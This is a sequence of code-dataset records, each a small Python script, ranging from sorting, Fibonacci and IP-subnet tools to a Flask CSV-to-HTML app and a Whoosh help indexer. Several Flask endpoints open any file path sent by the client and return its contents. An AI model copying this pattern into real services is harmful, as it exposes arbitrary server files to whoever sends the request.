instruction\n\n Using the first word of the instruction, figure out what operation\n to run. Pass the rest of the words of the instruction as an argument.\n\n Args:\n instruction: str\n Instruction to run. 
Must start with a valid operation\n identifier (key of self.operation_map)\n\n Returns:\n None\n \"\"\"\n words = instruction.split()\n func = self.operation_map[words[0]]\n func(self, *words[1:])\n\n def run_program(self, program):\n \"\"\"Run a list of instructions through the virtual machine\n\n The program terminates when the instruction pointer moves past the\n end of the program\n\n Args:\n program: [str]\n Instructions, each of which starts with a valid operation\n identifier\n Returns:\n int\n Contents of the return register when the program terminates\n \"\"\"\n while True:\n try:\n line = program[self.instruction_pointer]\n except IndexError:\n return self.registers[self.return_register]\n self.run_instruction(line)\n self.instruction_pointer = self.instruction_pointer + 1\n\n def run_input_file(self):\n \"\"\"Run the contents of today's input file through the virtual machine\n\n Returns:\n int\n Contents of the return register when the program terminates\n \"\"\"\n program = read_input_lines()\n return self.run_program(program)\n\n\ndef md5_increment(salt):\n \"\"\"Append an increasing integer to the salt and run an md5 hash on it\n\n Args:\n salt: str\n First characters of the string to be hashed. The remaining\n characters are increasing integers starting at 0\n\n Yields:\n md5_hash : str\n An md5 hash of the salt prepended to an integer\n \"\"\"\n for count in itertools.count():\n hashed = get_md5_hash(salt + str(count))\n yield count, hashed\n\n\ndef get_md5_hash(to_hash):\n \"\"\"Calculate the md5 hash of a string\n\n Args:\n to_hash: str\n The string to hash\n\n Returns:\n md5_hash: str\n The hex value of the md5 hash\n \"\"\"\n return hashlib.md5(to_hash.encode('utf-8')).hexdigest()\n\n\nif __name__ == '__main__':\n # start_coding_today()\n today = 25\n start_coding(today)\n","sub_path":"advent_tools.py","file_name":"advent_tools.py","file_ext":"py","file_size_in_byte":17321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"22344873","text":"'''\r\nBasic idea to divide and conquer\r\ngoal: nlogn\r\n\r\n'''\r\nclass Array():\r\n #to be sorted\r\n def __init__(self, array = []):\r\n self.array = array\r\n\r\n def mergesort(self, array):\r\n\r\n if len(array) == 1: return array\r\n\r\n mid = len(array) // 2\r\n left = array[0:mid]\r\n right = array[mid:]\r\n\r\n self.mergesort(left)\r\n self.mergesort(right)\r\n\r\n i = j = k = 0\r\n\r\n while i < len(left) and j < len(right):\r\n if left[i] < right[j]:\r\n array[k] = left[i]\r\n i += 1\r\n\r\n else:\r\n array[k] = right[j]\r\n j += 1\r\n\r\n k += 1\r\n\r\n while i < len(left):\r\n array[k] = left[i]\r\n i += 1\r\n k += 1\r\n while j < len(right):\r\n array[k] = right[j]\r\n j += 1\r\n k += 1\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n array = [4,1,9,16,2,7,8,3]\r\n a = Array(array)\r\n a.mergesort(a.array)\r\n print(a.array)\r\n","sub_path":"Sort/MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260544189","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 16 15:12:41 2018\r\n\r\n@author: bayuy\r\n\"\"\"\r\n\r\n# user input\r\nN = 13\r\n\r\n# list of fibonacci \r\nfibonacci = []\r\n\r\n# fill initial fibonacci numbers\r\nfibonacci.append(0)\r\nfibonacci.append(1)\r\n\r\n# for number of input\r\nfor i in range(2, N):\r\n # create fibonacci number\r\n fibonacci.append(fibonacci[i-2] + fibonacci[i-1])\r\n\r\n# print 
fibonacci list\r\nprint(fibonacci)","sub_path":"Algoritma_2.py","file_name":"Algoritma_2.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"14720411","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\n\r\n\r\n#Define some training data for the model\r\nx_train = [[34],[18],[39],[45],[52]] #Size of cellphone\r\ny_train = [[78],[82],[85],[90],[86]] #Price of cellphone\r\n\r\n#Define some testing data for the model\r\nx_test = [[19],[64],[27],[32]]\r\ny_test = [[75],[90],[70],[74]]\r\n\r\n#set the parameters for which values the line will show up on.\r\nxx = np.linspace(0,100,100)\r\n\r\nquadratic_featurizer = PolynomialFeatures(degree=2)\r\n\r\n#Transform the input data matrix into a new data matrix of the degree defined above\r\nx_train_quadratic = quadratic_featurizer.fit_transform(x_train)\r\nx_test_quadratic = quadratic_featurizer.transform(x_test)\r\n\r\n#Train and test the model\r\nregressor_quadratic = LinearRegression()\r\nregressor_quadratic.fit(x_train_quadratic, y_train)\r\nxx_quadratic = quadratic_featurizer.transform(xx.reshape(xx.shape[0],1))\r\n\r\n# Plot the graph\r\nplt.plot(xx, regressor_quadratic.predict(xx_quadratic), c='r', linestyle='--')\r\nplt.title('Cellphone size reqgressed on price')\r\nplt.xlabel('Size')\r\nplt.ylabel('Price')\r\nplt.axis([0, 100, 0, 150])\r\nplt.grid(True)\r\nplt.scatter(x_train, y_train)\r\nplt.show()\r\n","sub_path":"poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"535353596","text":"import pandas\r\nimport os\r\n\r\ndef fulfill_video(src_csv_file, target_csv_file):\r\n df = pandas.read_csv(src_csv_file)\r\n video_name = []\r\n for i, name in enumerate(df['video']):\r\n if not pandas.isnull(name):\r\n video_name.append(name)\r\n else:\r\n df['video'][i] = video_name[-1]\r\n print(df['video'][:10])\r\n\r\n df.to_csv(target_csv_file)\r\n\r\n\r\nsrc_csv_file = '/media/datasets/ld_data/tacos/tacos_precomp/original_csv/test.csv'\r\ntarget_csv_file = '/media/datasets/ld_data/tacos/tacos_precomp/test.csv'\r\nfulfill_video(src_csv_file, target_csv_file)\r\n\r\n\r\n\r\n","sub_path":"utils/process_csv.py","file_name":"process_csv.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"452544020","text":"import numpy as np\r\n\r\ndef addressCheck(string):\r\n field=string.split(\".\")\r\n ip=[]\r\n for index,_ in enumerate(field):\r\n try:\r\n ip.append(int(field[index]))\r\n except:\r\n print(\"\\n ----------------------------------------------\")\r\n print(\"\\n WARNING\")\r\n print(\"\\n the number entered is not valid\")\r\n print(\"\\n ----------------------------------------------\")\r\n for index,_ in enumerate(ip):\r\n if ip[index] < 0:\r\n ip[index] = 0\r\n if ip[index] > 255:\r\n ip[index] = 255\r\n while len(ip) > 4:\r\n ip.pop(len(ip)-1)\r\n while len(ip) < 4:\r\n ip.append(0)\r\n return ip\r\n\r\ndef maskCheck(string):\r\n try:\r\n mask=int(string)\r\n except:\r\n print(\"\\n ----------------------------------------------\")\r\n print(\"\\n WARNING\")\r\n print(\"\\n the number entered is not valid\")\r\n print(\"\\n ----------------------------------------------\")\r\n mask=24\r\n if (mask < 1):\r\n mask = 
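The forward-fill loop in process_csv.py above is something pandas can do directly; a sketch of the equivalent using fillna (the function name is mine, the paths stay placeholders):

import pandas

def fulfill_video_ffill(src_csv_file, target_csv_file):
    df = pandas.read_csv(src_csv_file)
    # 'ffill' propagates the last non-null 'video' value forward,
    # matching the manual loop in fulfill_video.
    df['video'] = df['video'].fillna(method='ffill')
    df.to_csv(target_csv_file)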
1\r\n if (mask > 31):\r\n mask=31\r\n return mask\r\n\r\ndef findIP(binaryIP, mask):\r\n n_host = hostNumber(mask)\r\n binaryIP = resetHostIpPart(binaryIP, mask)\r\n ip=[]\r\n ip.append(list(np.repeat(binaryIP, 1)))\r\n while(n_host != 0):\r\n ip.append(IncreaseIP(list(np.repeat(ip[-1], 1))))\r\n n_host-=1\r\n return ip\r\n\r\ndef hostNumber(mask):\r\n number=(2 ** (32-mask)) - 2\r\n return number\r\n\r\ndef resetHostIpPart(binaryIP, mask):\r\n for index in range(mask,32):\r\n binaryIP[index]=0\r\n return binaryIP\r\n\r\ndef IncreaseIP(binaryIP):\r\n increase=1\r\n index=1\r\n while (increase==1):\r\n if binaryIP[-index] == 1:\r\n binaryIP[-index] = 0\r\n index += 1\r\n else:\r\n binaryIP[-index] = 1\r\n increase = 0\r\n if index >= (len(binaryIP)-1):\r\n increase = 0\r\n return binaryIP\r\n \r\ndef binaryAddress(decimalIP):\r\n ip=[]\r\n for index,_ in enumerate(decimalIP):\r\n num=decimalIP[index]\r\n cont = 0\r\n ip_temp=[]\r\n for _,_ in enumerate(ip_temp):\r\n ip_temp.pop()\r\n while cont < 8:\r\n if num > 0:\r\n if num%2==0:\r\n ip_temp.append(0)\r\n num=num/2\r\n else:\r\n ip_temp.append(1)\r\n num=(num-1)/2\r\n else:\r\n ip.append(0)\r\n cont += 1\r\n ip += ip_temp\r\n return ip\r\n\r\ndef decimalAddress(binaryIP):\r\n string=[\"\",\"\",\"\",\"\"]\r\n ip=[]\r\n for index,_ in enumerate(binaryIP):\r\n pos=int(index/8)\r\n string[pos]+=str(binaryIP[index])\r\n for index,_ in enumerate(string):\r\n ip.append(int(string[index], 2))\r\n return ip\r\n \r\ndef main():\r\n string=input (\"enter ip address (decimal mode) \\n\")\r\n ip_d=addressCheck(string)\r\n ip_b=binaryAddress(ip_d)\r\n string=input (\"enter ip mask (only number) \\n\")\r\n mask=maskCheck(string)\r\n list_b_ip=findIP(ip_b,mask)\r\n list_d_ip=[]\r\n for index,_ in enumerate(list_b_ip):\r\n list_d_ip.append(decimalAddress(list_b_ip[index]))\r\n print(list_d_ip[index])\r\n\r\n \r\n\r\n\r\n \r\n\r\n#this function is used to convert the program into a library in case you want to use it in that way\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"es_ip.py","file_name":"es_ip.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"236447666","text":"# 正则替换\nimport re\n\n\ndef conv(value):\n matched = value.group()\n return \"!!\" + matched + \"!!\"\n\n\nlanguage = 'PythonC#JavaC#PHPC#'\n\nr = re.sub('C#', conv, language, 0)\n\nprint(r)\n# s = language.replace('C#', 'GO')\n# print(s)\n","sub_path":"regex_json/c11.py","file_name":"c11.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"117782822","text":"def solve_part_1(puzzle_input: str):\n return sum(map(int, puzzle_input.splitlines()))\n\n\ndef solve_part_2(puzzle_input: str):\n unique_frequencies = set([0])\n frequency = 0\n\n while True:\n for increment in map(int, puzzle_input.split('\\n')):\n frequency += increment\n\n if frequency in unique_frequencies:\n return frequency\n\n unique_frequencies.add(frequency)\n","sub_path":"puzzle1.py","file_name":"puzzle1.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"104285322","text":"import cv2\nfrom PIL import Image\nfrom numpy import zeros, arange\nfrom matplotlib.pyplot import figure, show\nfrom skimage.color import rgb2grey\nimport cv2 as cv\nfrom sys import argv\nfrom morph import *\nfrom imworks import *\n\n\ndef 
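One caveat in the es_ip.py script above: binaryAddress collects each octet's bits least-significant-first (the bits are appended as num % 2 is taken and never reversed), so the host enumeration operates on reversed octets. A corrected sketch, with a function name of my own:

def binary_address_fixed(decimal_ip):
    bits = []
    for octet in decimal_ip:
        # format(octet, '08b') renders eight bits, most-significant first.
        bits.extend(int(b) for b in format(octet, '08b'))
    return bits

# binary_address_fixed([192, 168, 0, 1])[:8] -> [1, 1, 0, 0, 0, 0, 0, 0]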
pupil_detect(fname):\n\n '''\n Mark the pupil region for an eye image.\n\n Parameters\n ----------\n fname: string\n Name of the image given in string format.\n\n Returns\n -------\n pupil:\n A new binary image in which the the pupil is marked\n as object(white) and the rest of the region is marked\n background(black).\n\n '''\n\n img = cv2.imread(fname)\n orig = zeros(img.shape)\n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n for k in range(img.shape[2]):\n orig[i, j, k] = img[i, j, k]\n pos1 = zeros([img.shape[0], img.shape[1]])\n im = Image.open(fname)\n pix = im.load()\n height, width = img.shape[:2]\n height = height-1\n width = width-1\n count = 0\n for eh in range(height):\n for ew in range(width):\n r, g, b = pix[ew, eh]\n if r <= 30 and g <= 30 and b <= 30:\n cv2.circle(img, (ew, eh), 1, (0, 255, 0), 1)\n cv2.circle(pos1, (ew, eh), 1, 255, 1)\n # pos1 is the pupil\n pupil = erode(pos1, 15)\n pupil = dilate(pupil, 8)\n return pupil\n\n#iris_img = pupil_detect(\"left.bmp\")\n#disp(iris_img)","sub_path":"Source code/pupil.py","file_name":"pupil.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"261716590","text":"from enum import auto, Enum\n\nACCOUNT_DIGITS_QUANTITY = 9 # The quantity of digits that a valid account has\nCHARACTER_QUANTITY_BY_DIGIT = 7 # The quantity of characters needed to represent a digit in machine format\nCHARACTER_QUANTITY_PER_LINE = 27 # The quantity of characters in each line of the file\nILLEGIBLE_DIGIT_IDENTIFIER = '?' # The character that represents an illegible digit\n\n\nclass Digit(Enum):\n \"\"\"\n Enumeration that models the expected way in which a digit is represented in a file. Each boolean represents the\n existence or not of the marking character (PIPE or UNDERLINE).\n \"\"\"\n ZERO = ([True, True, False, True, True, True, True], '0', 0)\n ONE = ([False, False, False, True, False, False, True], '1', 1)\n TWO = ([True, False, True, True, True, True, False], '2', 2)\n THREE = ([True, False, True, True, False, True, True], '3', 3)\n FOUR = ([False, True, True, True, False, False, True], '4', 4)\n FIVE = ([True, True, True, False, False, True, True], '5', 5)\n SIX = ([True, True, True, False, True, True, True], '6', 6)\n SEVEN = ([True, False, False, True, False, False, True], '7', 7)\n EIGHT = ([True, True, True, True, True, True, True], '8', 8)\n NINE = ([True, True, True, True, False, True, True], '9', 9)\n\n def __init__(self, array, char, integer):\n self.array = array\n self.char = char\n self.integer = integer\n\n @classmethod\n def parse_array(cls, array):\n for digit in cls:\n if digit.array == array:\n return digit\n\n\nclass Status(Enum):\n \"\"\"\n The status of an account.\n \"\"\"\n OK = auto()\n ILL = auto()\n ERR = auto()\n AMB = auto()\n\n\ndef to_string(account):\n \"\"\"\n Converts an account to a String.\n :param account: the account modeled as a list of digits\n :return: the account as a String\n \"\"\"\n return ''.join([ILLEGIBLE_DIGIT_IDENTIFIER if digit is None else digit.char for digit in account])\n\n\ndef is_valid(digits):\n \"\"\"\n Check if a legible account is valid.\n :param digits: an account modeled as a list of Digit.\n :return: true if is, and false if it is not.\n \"\"\"\n if len(digits) == ACCOUNT_DIGITS_QUANTITY and digits.count(None) == 0:\n account_numbers = [digit.integer for digit in digits]\n weighted_sum = 0\n for index in range(len(account_numbers)):\n weighted_sum += account_numbers[index] * 
(len(account_numbers) - index)\n return weighted_sum % 11 == 0\n else:\n return False\n\n\ndef find_possible_valid_account(digits_as_booleans_arrays, index):\n \"\"\"\n Make a single change in a specific digit trying to find a possible valid account.\n :param digits_as_booleans_arrays: the digits of the account, modeled as a list of booleans' arrays.\n :param index: the index of the array to which make the single change.\n :return: a possible valid account modeled as a list of Digit or None if not found.\n \"\"\"\n digits = [Digit.parse_array(digit_as_boolean_array) for digit_as_boolean_array in digits_as_booleans_arrays]\n for i in range(CHARACTER_QUANTITY_BY_DIGIT):\n changed_array = digits_as_booleans_arrays[index].copy()\n changed_array[i] = not changed_array[i]\n digits[index] = Digit.parse_array(changed_array)\n if is_valid(digits):\n # since two accounts can not be valid at the same time changing only one digit in same position, stop here.\n return digits\n\n\nclass Account:\n \"\"\"\n Model of an account that was parsed from a file.\n \"\"\"\n\n def __init__(self, digits_as_booleans_arrays):\n \"\"\"\n Initialize an account object using the list of digits of the account.\n :param digits_as_booleans_arrays: the list of digits of an account. Each digit is modeled as a list of booleans.\n \"\"\"\n digits = [Digit.parse_array(digit_as_boolean_array) for digit_as_boolean_array in digits_as_booleans_arrays]\n self.ambiguities = []\n # Count illegible digits\n illegible_digits_count = digits.count(None)\n if illegible_digits_count > 1:\n # If the count is greater than 2, set the account string using the illegible char, set the status and return\n self.number = to_string(digits)\n self.status = Status.ILL\n elif illegible_digits_count == 0 and is_valid(digits):\n # if the count is 0 and account is valid\n self.number = to_string(digits)\n self.status = Status.OK\n elif illegible_digits_count == 0:\n # if the count is 0 but the account is not valid, try to find a correct account by making a single change\n r = range(ACCOUNT_DIGITS_QUANTITY)\n mapper = map(lambda i: find_possible_valid_account(digits_as_booleans_arrays, i), r)\n possible_valid_accounts = [account for account in mapper if account is not None]\n if len(possible_valid_accounts) == 0:\n # making a single change generated no valid account\n self.number = to_string(digits)\n self.status = Status.ERR\n elif len(possible_valid_accounts) == 1:\n # making a single change generated one valid account\n self.number = to_string(possible_valid_accounts[0])\n self.status = Status.OK\n else:\n # making a single change generated more than one valid account\n self.number = to_string(digits)\n self.status = Status.AMB\n self.ambiguities = list(map(lambda account: to_string(account), possible_valid_accounts))\n else:\n # there is only one illegible character. Make one change in it until a valid account is found\n possible_valid_account = find_possible_valid_account(digits_as_booleans_arrays, digits.index(None))\n if possible_valid_account is None:\n # there was no possible valid account making only one change. The account is illegible\n self.number = to_string(digits)\n self.status = Status.ILL\n else:\n # making a single change generated a possible account. 
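A quick worked example of the mod-11 checksum that is_valid above implements (the account number is the classic bank-OCR kata example, not data from this file):

# For 345882865 the digit weights run from 9 down to 1:
#   3*9 + 4*8 + 5*7 + 8*6 + 8*5 + 2*4 + 8*3 + 6*2 + 5*1 = 231
# and 231 % 11 == 0, so the account is valid.
digits = [3, 4, 5, 8, 8, 2, 8, 6, 5]
assert sum(d * (len(digits) - i) for i, d in enumerate(digits)) % 11 == 0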
It is the correct one\n self.number = to_string(possible_valid_account)\n self.status = Status.OK\n","sub_path":"python/domain/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":6293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"8408827","text":"#\r\n# @lc app=leetcode id=127 lang=python3\r\n#\r\n# [127] Word Ladder\r\n#\r\n\r\n# @lc code=start\r\nclass Solution:\r\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\r\n tree, wordSet, n = collections.defaultdict(set), set(wordList), len(beginWord)\r\n if endWord not in wordSet:\r\n return 0\r\n \r\n bq, eq, nq, found, dist = {beginWord}, {endWord}, set(), False, 1\r\n\r\n while bq and not found:\r\n dist += 1\r\n wordSet -= bq\r\n for x in bq:\r\n for y in [x[:i]+c+x[i+1:] for i in range(n) for c in 'qwertyuiopasdfghjklzxcvbnm']:\r\n if y in wordSet:\r\n if y in eq:\r\n found = True\r\n break\r\n else:\r\n nq.add(y)\r\n bq, nq = nq, set()\r\n if bq > eq:\r\n bq, eq = eq, bq\r\n return dist if found else 0\r\n# @lc code=end\r\n\r\n","sub_path":"java/leetcode/127.word-ladder.py","file_name":"127.word-ladder.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"457236163","text":"import nox\n\n\n@nox.session\ndef lint(session):\n lint_tools = [\"black\", \"isort\", \"flake8\"]\n targets = [\"tabula\", \"tests\", \"noxfile.py\"]\n session.install(*lint_tools)\n session.run(\"flake8\", *targets)\n session.run(\"black\", \"--diff\", \"--check\", *targets)\n session.run(\"isort\", \"--check-only\", *targets)\n\n\n@nox.session\ndef tests(session):\n session.install(\".[test]\")\n session.run(\"pytest\", \"-v\")\n","sub_path":"noxfile.py","file_name":"noxfile.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"363132359","text":"#!/usr/bin/env python3\n\nimport zmq\nimport sys\nimport ast\nimport time\n\n'''\n recognized commands:\n play\n pause\n step\n bots\n food\n shutdown\n save\n load\n \n'''\n\ndef print_bot(bot):\n print(\"%d %.1f %s\" % (bot['id'], bot['mass'], bot['pos']))\n\ndef get_result(socket, request):\n socket.send_string(request)\n result = ast.literal_eval(socket.recv_string())\n if 'result' not in result or result['result'] != 'ok':\n raise Exception('request \"%s\" did not return successfully' % request)\n return result\n\ndef main():\n c = zmq.Context()\n s = c.socket(zmq.REQ)\n # self._req_poller = zmq.Poller()\n #._req_poller.register(self._req_socket, zmq.POLLIN)\n s.connect('tcp://127.0.0.1:5555')\n cmd = sys.argv[1]\n if cmd == 'run':\n t = time.time()\n n = 0\n while True:\n get_result(s, 'step')\n bots = get_result(s, 'bots')['bots']\n food = get_result(s, 'food')['food']\n state = get_result(s, 'state')['state']\n td = time.time() - t\n n += 1\n print(n, len(bots), len(food), state['frame_count'], n / td)\n else:\n\n r = get_result(s, ' '.join(sys.argv[1:]))\n \n for k in sorted(r.keys()):\n print(\"%s: %s\" % (k, str(r[k])))\n if 'state' in r:\n state = r['state']\n for k in sorted(state.keys()):\n print(\"%s: %s\" % (k, str(state[k])))\n if 'frame_chunk_count' in state and 'frame_chunk_dur_us' in state:\n _dur = state['frame_chunk_dur_us']\n _chunk_count = state['frame_chunk_count']\n if _dur is not 0 and _chunk_count is not 0:\n print(_dur, _chunk_count)\n print(\"ns/frame: %.2d\" % (_dur / _chunk_count * 
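A reading note on the word-ladder solution above: `bq > eq` is Python's set superset test, so the frontier swap presumably intends a size comparison, i.e. always expand the smaller side of the bidirectional BFS. The usual spelling (my reading, not a verified fix):

# Expanding the smaller frontier keeps the two search waves balanced.
if len(bq) > len(eq):
    bq, eq = eq, bq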
10**3))\n print(\"fps: %d\" % (_chunk_count / _dur * 10**6))\n if 'bots' in r:\n for b in sorted(r['bots'], key=lambda k: k['id']):\n print_bot(b)\n print(len(r['bots']))\n\n if 'food' in r:\n for b in sorted(r['food'], key=lambda k: k['mass']):\n print(b)\n print(len(r['food']))\n\n \nif __name__ == '__main__':\n main()\n \n\n","sub_path":"arms-race-cli.py","file_name":"arms-race-cli.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"439859465","text":"from __future__ import print_function\nimport time\nfrom flask import Flask, render_template, request, Response, make_response\nimport csv\nimport json\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef main():\n p = time.time()\n return render_template(\"index.html\", p=p)\n\n@app.route(\"/adfo\")\ndef adfo():\n p = time.time()\n return render_template(\"adfo.html\", p=p)\n\n@app.route(\"/csv\")\ndef csvinput():\n p = time.time()\n return render_template(\"csv.html\", p=p)\n\n@app.route(\"/csvresponce\", methods=['POST'])\ndef csvresponce():\n path = request.json['path']\n csv_file = open(path, \"r\", encoding=\"utf-8\", errors=\"\", newline=\"\")\n f = csv.reader(csv_file, delimiter=\",\", doublequote=True, lineterminator=\"\\r\\n\", quotechar='\"', skipinitialspace=True)\n list = [e for e in f]\n return json.dumps(list[0])\n\n@app.route(\"/csvtohtml\", methods=['GET', 'POST'])\ndef csvoutput():\n if request.form:\n tags = request.form.getlist('tags')\n tags = ['div' if '' == s else s for s in tags]\n attrnames = request.form.getlist('attrname')\n attrnames = ['class' if '' == s else s for s in attrnames]\n path = request.form['path']\n csv_file = open(path, \"r\", encoding=\"utf-8\", errors=\"\", newline=\"\")\n f = csv.reader(csv_file, delimiter=\",\", doublequote=True, lineterminator=\"\", quotechar='\"', skipinitialspace=True)\n if request.form['target'] == \"vuedata\":\n html = csvtovue(f)\n else :\n html = csvtohtml(f, attrnames, tags)\n return Response(html, mimetype='text/plain')\n else:\n return Response(\"NO DATA\", mimetype='text/plain')\n\ndef csvtohtml(f, attrnames, tags):\n html = \"\"\n header = next(f)\n for row in f:\n attrs = {\n attrnames[0]: row[0]\n }\n html += wraphtml(\"\", tags[0], attrs, \"open\")\n for index, cell in enumerate(row):\n if(index <= 0):\n continue\n elif cell == \"\":\n continue\n attrname = attrnames[index]\n head = header[index]\n tag = tags[index]\n attrs = {\n attrname: head\n }\n cell = cell.replace('\\r\\n', '
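A small correctness note on the stats branch in arms-race-cli.py above: `_dur is not 0` tests object identity, which only works by accident for small cached ints (and fails outright for floats); equality is the safe spelling. The intended guard, as I read it:

# '!=' compares values; 'is not' compares identity and is fragile here.
if _dur != 0 and _chunk_count != 0:
    print("ns/frame: %.2d" % (_dur / _chunk_count * 10**3))
    print("fps: %d" % (_chunk_count / _dur * 10**6))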
')\n cell = cell.replace('\\n','
')\n html += wraphtml(cell, tag, attrs)\n html += wraphtml (\"\", tags[0], \"\", \"close\")\n return html\n\ndef csvtovue(f):\n html = \"\"\n header = next(f)\n for row in f:\n html += \"{\\r\\n\"\n for index, cell in enumerate(row):\n if cell == \"\":\n continue\n head = header[index]\n cell = cell.replace('\\r\\n','
')\n cell = cell.replace('\\n','
')\n html += ' '+head+': \"'+cell+'\",\\r\\n'\n html += \"},\\r\\n\"\n return html\n\ndef wraphtml(html=\"\", tag=\"p\", attrs=\"\", part=False):\n attr = \" \"\n if attrs:\n for name, value in attrs.items():\n attr += name+'=\"'+value+'\" '\n if not part:\n wrapped = '\\r\\n <'+tag+attr+'>'+html+''\n elif part=='open':\n wrapped = '<'+tag+attr+'>'+html\n elif part=='close':\n wrapped = '\\r\\n\\r\\n'\n return wrapped\n\n\n@app.route(\"/result\", methods=['GET', 'POST'])\ndef result():\n datas = request.form\n result = \"\"\n for data in datas.values():\n content = open(data, \"r\", encoding=\"utf-8_sig\")\n result += content.read()\n content.close()\n return Response(result, mimetype='')\n\n@app.route(\"/save\", methods=['GET', 'POST'])\ndef save():\n datas = request.form\n result = \"\"\n for data in datas.values():\n content = open(data, \"r\", encoding=\"utf-8_sig\")\n result += content.read()\n content.close()\n response = make_response()\n response.data = result\n response.headers['Content-Type'] = 'application/force-download'\n response.headers['Content-Disposition'] = u'attachment; filename=index.html'\n return response\n\nif __name__ == \"__main__\":\n app.run(host=\"127.0.0.1\", port=5000)\n","sub_path":"resources/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260088925","text":"from whoosh.index import create_in, open_dir\nfrom whoosh.analysis import StemmingAnalyzer\nfrom whoosh.fields import *\n\nimport os\nimport shutil\nimport glob\nimport re\nfrom bs4 import BeautifulSoup\n\nhtmlDocDir = 'SeriesMgrHtmlDoc'\nindexDir = 'SeriesMgrHelpIndex'\n\ndef BuildHelpIndex():\n\n\tif os.path.exists( indexDir ):\n\t\tshutil.rmtree( indexDir, ignore_errors = True )\n\tos.mkdir( indexDir )\n\n\tstemmingAnalyzer = StemmingAnalyzer()\n\tschema = Schema( path=ID(stored=True, unique=True), section=TEXT(stored=True), title=TEXT(stored=True, analyzer=stemmingAnalyzer),\n\t\t\t\t\tlevel=NUMERIC(stored=True), content=TEXT(stored=True, analyzer=stemmingAnalyzer) )\n\tix = create_in( indexDir, schema )\n\twriter = ix.writer()\n\n\ttitleTags = set(['h1', 'h2', 'h3', 'h4', 'h5'])\n\n\tnewLines = re.compile( '\\n+' )\n\tnonNumeric = re.compile( r'[^\\d]' )\n\n\tdef addDocument( fname, section, lastTitle, textCur ):\n\t\t# print( 'addDocument: lastTitle={}'.format(lastTitle) )\n\t\tif lastTitle and textCur:\n\t\t\tsection = '|'.join( section ) if section else lastTitle.get_text()\n\t\t\t# print( 'Indexing: {}: {}'.format(os.path.basename(fname), section) )\n\t\t\tcontent = newLines.sub( '\\n', '\\n'.join(textCur) )\n\t\t\twriter.add_document(\tpath = os.path.basename(fname) + '#' + lastTitle['id'],\n\t\t\t\t\t\t\t\t\ttitle = lastTitle.get_text(),\n\t\t\t\t\t\t\t\t\tsection = section,\n\t\t\t\t\t\t\t\t\tlevel = int(nonNumeric.sub('', lastTitle.name)),\n\t\t\t\t\t\t\t\t\tcontent = content )\n\n\t# Extract content sections from the html pages.\n\tfor f in glob.iglob( os.path.join(htmlDocDir, '*.html') ):\n\t\tdoc = BeautifulSoup( open(f).read(), 'html.parser' )\n\t\tdiv = doc.find('div', class_='content')\n\t\tif not div:\n\t\t\tcontinue\n\t\t\t\t\n\t\tlastTitle = None\n\t\ttextCur = []\n\t\tsection = []\n\t\tfor child in div.contents:\n\t\t\ttry:\n\t\t\t\ttag = child.name\n\t\t\texcept Exception:\n\t\t\t\ttag = None\n\t\t\t\n\t\t\tif tag not in titleTags:\n\t\t\t\ttry:\n\t\t\t\t\ttextCur.append( child.get_text() )\n\t\t\t\texcept 
Exception:\n\t\t\t\t\tpass\n\t\t\t\tcontinue\n\t\t\t\n\t\t\taddDocument( f, section, lastTitle, textCur )\n\t\t\t\n\t\t\tiSection = int(int(nonNumeric.sub('', tag))) - 1\n\t\t\tsection = section[:iSection]\n\t\t\tsection.append( child.get_text() )\n\t\t\t\n\t\t\tlastTitle = child\n\t\t\ttextCur = []\n\t\t\t\t\n\t\taddDocument( f, section, lastTitle, textCur )\n\n\twriter.commit()\n\n#---------------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n\tBuildHelpIndex()\n\t\n\tfrom whoosh.qparser import QueryParser\n\tix = open_dir( indexDir, readonly=True )\n\n\twith ix.searcher() as searcher, open('search.html', 'w') as f:\n\t\tquery = QueryParser('content', ix.schema).parse('fastest lap')\n\t\tresults = searcher.search(query, limit=20)\n\t\tf.write( '\\n' )\n\t\tfor i, hit in enumerate(results):\n\t\t\tf.write( '\\n' % ((i+1), hit['path'], hit['section'], hit.highlights('content')) )\n\t\tf.write( '
<tr><th>Section</th><th>Match</th></tr>
